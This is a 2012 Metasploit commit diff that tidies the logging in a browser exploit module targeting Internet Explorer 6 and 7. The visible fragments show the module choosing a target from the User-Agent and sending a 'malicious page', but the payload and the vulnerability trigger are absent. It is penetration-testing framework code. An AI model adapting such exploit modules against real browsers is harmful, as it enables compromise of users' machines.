We no longer have to print the client's IP, because it's now a built-in feature.

unstable
sinn3r 2012-05-01 12:47:55 -05:00
parent 094e7d0327
commit 3099236059
1 changed files with 4 additions and 5 deletions

View File

@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote
The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: $",
'Author' =>
[
'Florent Hochwelker', # aka TaPiOn, Vulnerability discovery
@ -95,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
#Default target
my_target = target
vprint_status("#{cli.peerhost.ljust(16)} #{self.shortname} User-Agent: #{request.headers['User-Agent']}")
vprint_status("User-Agent: #{request.headers['User-Agent']}")
if target.name == 'Automatic'
agent = request.headers['User-Agent']
@ -118,12 +117,12 @@ class Metasploit3 < Msf::Exploit::Remote
#Pick the right target
my_target = get_target(cli, request)
if my_target.nil?
vprint_error("#{cli.peerhost.ljust(16)} #{self.shortname} Target not supported")
vprint_error("Target not supported")
send_not_found(cli)
return
end
vprint_status("#{cli.peerhost.ljust(16)} #{self.shortname} URL: #{request.uri.to_s}")
vprint_status("URL: #{request.uri.to_s}")
#ARCH used by the victim machine
arch = Rex::Arch.endian(my_target.arch)
@ -209,7 +208,7 @@ class Metasploit3 < Msf::Exploit::Remote
#Remove extra tabs in HTML
html = html.gsub(/^\t\t/, "")
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending malicious page")
print_status("Sending malicious page")
send_response( cli, html, {'Content-Type' => 'text/html'} )
end
end